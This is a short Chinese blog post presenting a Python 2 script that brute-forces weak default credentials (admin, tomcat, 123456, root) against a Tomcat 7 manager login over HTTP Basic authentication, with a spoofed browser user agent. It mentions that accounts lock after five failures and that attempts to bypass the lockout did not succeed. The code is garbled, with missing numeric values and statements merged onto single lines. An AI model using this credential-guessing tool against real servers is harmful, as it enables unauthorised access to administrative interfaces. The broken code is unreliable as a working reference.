Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令。
测试环境:Tomcat版本 7.0
登录界面采用basic认证,Base 64加密一下,模拟浏览器进行发包
据测试,每个用户名输入5次错误的密码会锁定用户,想了一些办法,还是没能绕过,这里做个记录,有时间再完善。
目前只能用于简单的弱口令测试
Python脚本如下:
import urllib
import urllib2
import time
import base64 names=['admin','tomcat']
passwds=['','admin','tomcat','123456','root']
for name in names:
name=name.rstrip()
for passwd in passwds:
passwd=passwd.rstrip()
user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)"
Authorization = "Basic %s" % (base64.b64encode(name+':'+passwd))
header = { 'User-Agent' : user_agent , 'Authorization':Authorization} try:
url = "http://192.168.106.137:8080/manager/html"
request = urllib2.Request(url,headers=header)
response = urllib2.urlopen(request,timeout=)
result=response.read() if response.code ==:
print '[Success] ' + url+' '+name+':'+passwd
break except:
print '[false111] ' + url+' '+name+':'+passwd
time.sleep()
关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。
